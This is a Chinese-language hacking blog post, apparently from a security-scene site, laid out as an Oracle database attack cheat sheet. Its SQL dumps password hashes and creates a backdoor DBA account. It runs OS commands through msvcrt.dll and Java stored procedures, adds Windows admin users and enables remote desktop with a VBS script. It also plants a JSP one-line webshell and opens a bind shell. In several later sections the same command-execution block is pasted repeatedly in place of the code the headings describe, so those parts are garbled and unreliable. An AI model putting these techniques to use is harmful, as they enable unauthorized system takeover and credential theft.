# 鬼仔注:Open发我的一张图片 oracle_scanner.png
作者:Robert
配合open那个工具
第一部分
基本查询指令
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs//查询当前用户角色
select * from user_sys_privs//查询当前用户系统权限
select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee=’SYSTEM’;//查系统权限
grant select any dictionary to system with admin option;//登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name=’SCOTT’; //低版本查看单用户密码
Select username,decode(password,NULL,’NULL’,password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;//建用户bob密码iloveyou
grant dba to bob;//赋予bob DBA权限
grant execute on xmldom to bob //赋予用户execute
Create ROLE “javauserpriv” NOT IDENTIFIED
Create ROLE “javasyspriv” NOT IDENTIFIED //当提示role ‘JAVASYSPRIV’ does not exist使用
select grantee from dba_role_privs where granted_role=’DBA’; //检查那些用户有DBA权限
select * from dba_directories;//查看路径所在目录
第二部分,创建java,执行系统命令
no.1
Create or REPLACE LIBRARY exec_shell AS 'c:/windows/system32/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
上面这个没有回显的
如果不行可以使用下面这个
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
执行完后
执行
exec oracmd.exec ('net1 user robert iloveyou /add');
no2.
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS import java.io.*; public class Host { public static void executeCommand(String command) { try { String[] finalCommand; if (isWindows()) { finalCommand = new String[4]; // Use the appropriate path for your windows version. finalCommand[0] = "C://windows//system32//cmd.exe"; // Windows XP/2003 //finalCommand[0] = "C://winnt//system32//cmd.exe"; // Windows NT/2000 finalCommand[1] = "/y"; finalCommand[2] = "/c"; finalCommand[3] = command; } else { finalCommand = new String[3]; finalCommand[0] = "/bin/sh"; finalCommand[1] = "-c"; finalCommand[2] = command; } final Process pr = Runtime.getRuntime().exec(finalCommand); pr.waitFor(); new Thread(new Runnable(){ public void run() { BufferedReader br_in = null; try { br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); String buff = null; while ((buff = br_in.readLine()) != null) { System.out.println("Process out :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_in.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process output."); ioe.printStackTrace(); } finally { try { br_in.close(); } catch (Exception ex) {} } } }).start(); new Thread(new Runnable(){ public void run() { BufferedReader br_err = null; try { br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); String buff = null; while ((buff = br_err.readLine()) != null) { System.out.println("Process err :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_err.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process error."); ioe.printStackTrace(); } finally { try { br_err.close(); } catch (Exception ex) {} } } }).start(); } catch (Exception ex) { System.out.println(ex.getLocalizedMessage()); } } public static boolean isWindows() { if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) return true; else return false; } }; / Create or REPLACE PROCEDURE host_command (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME 'Host.executeCommand (java.lang.String)'; / EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete'); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); / DECLARE l_output DBMS_OUTPUT.chararr; l_lines INTEGER := 1000; BEGIN DBMS_OUTPUT.enable(1000000); DBMS_JAVA.set_output(1000000); host_command('dir C:/'); DBMS_OUTPUT.get_lines(l_output, l_lines); END;
这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的
host_command(‘dir C:/’);
no3.
create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try { Process p = rt.exec(args); int bufSize = 4096; BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis.read(buffer, 0, bufSize)) != -1) System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace(); RC = -1; } finally { return RC; } } } / create or replace function RUN_CMz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; / create or replace procedure RC(p_cmd in varChar) as x number; begin x := RUN_CMz(p_cmd); end; / variable x number; set serveroutput on; exec dbms_java.set_output(100000); grant javasyspriv to system;
这句注意最后这里要授权下当前登陆的用户
grant javasyspriv to system
最后执行
exec :x:=run_cmz('ipconfig');
第二部分 操作磁盘文件
no1.
建立目录
create or replace directory DIR as 'C:/';
此目录当然也可以是启动目录
授权
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了
这步操作讲下载我的木马到c盘并执行
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', '3389.vbs', 'W'); utl_file.put_line(file, 'Dim OperationRegistry Set OperationRegistry=WScript.createObject("WScript.Shell") Dim TSPort,TSState,TSRegPath TSRegPath="HKLM/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp/PortNumber" TSPort=OperationRegistry.RegRead(TSRegPath) TSRegPath="HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/fDenyTSConnections" TSState=OperationRegistry.RegRead(TSRegPath) If TSState=0 Then Else OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" End If'); utl_file.fflush(file); utl_file.fclose(file); end; / exec :x:=run_cmz('cscript c:/3389.vbs');
vbs开启3389
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
0
无net添加admin用户
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
1
这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了
第三部分 linux的一些操作
linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
2
这么一大段,仔细看
执行完后
Select BOB_LISTFOLDER(‘/usr’) FROM DUAL //列目录
Select BOB_EXECFILE(‘C:/WINDOWS/system32/cmd.exe /c dir c:/’,’GBK’) FROM DUAL; //执行命令
Select BOB_READFILE(‘/tmp/1.txt’,’GBK’) FROM DUAL; //读文件
Select BOB_SAVEFILE(‘/tmp/1.jsp’,'<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“//”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>’) FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG
Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去
其中本来还有reserver shell的
我还没来的及测试
我自己是更中意反弹shell的
特别是linux
好操作的多
再说有时候linux是nat出来的
反弹就去了许多麻烦
第四部分 技巧
一句话读取3389端口
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
3
一句话开3389 只合适win 2k3
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
4
删除pcanywhere导致的终端登陆错误
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
5
感谢kj,和linx的文章.
最后说下,关于web injection部分
有时间在整理吧
不妥之处,请指教 QQ:1972097
over
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论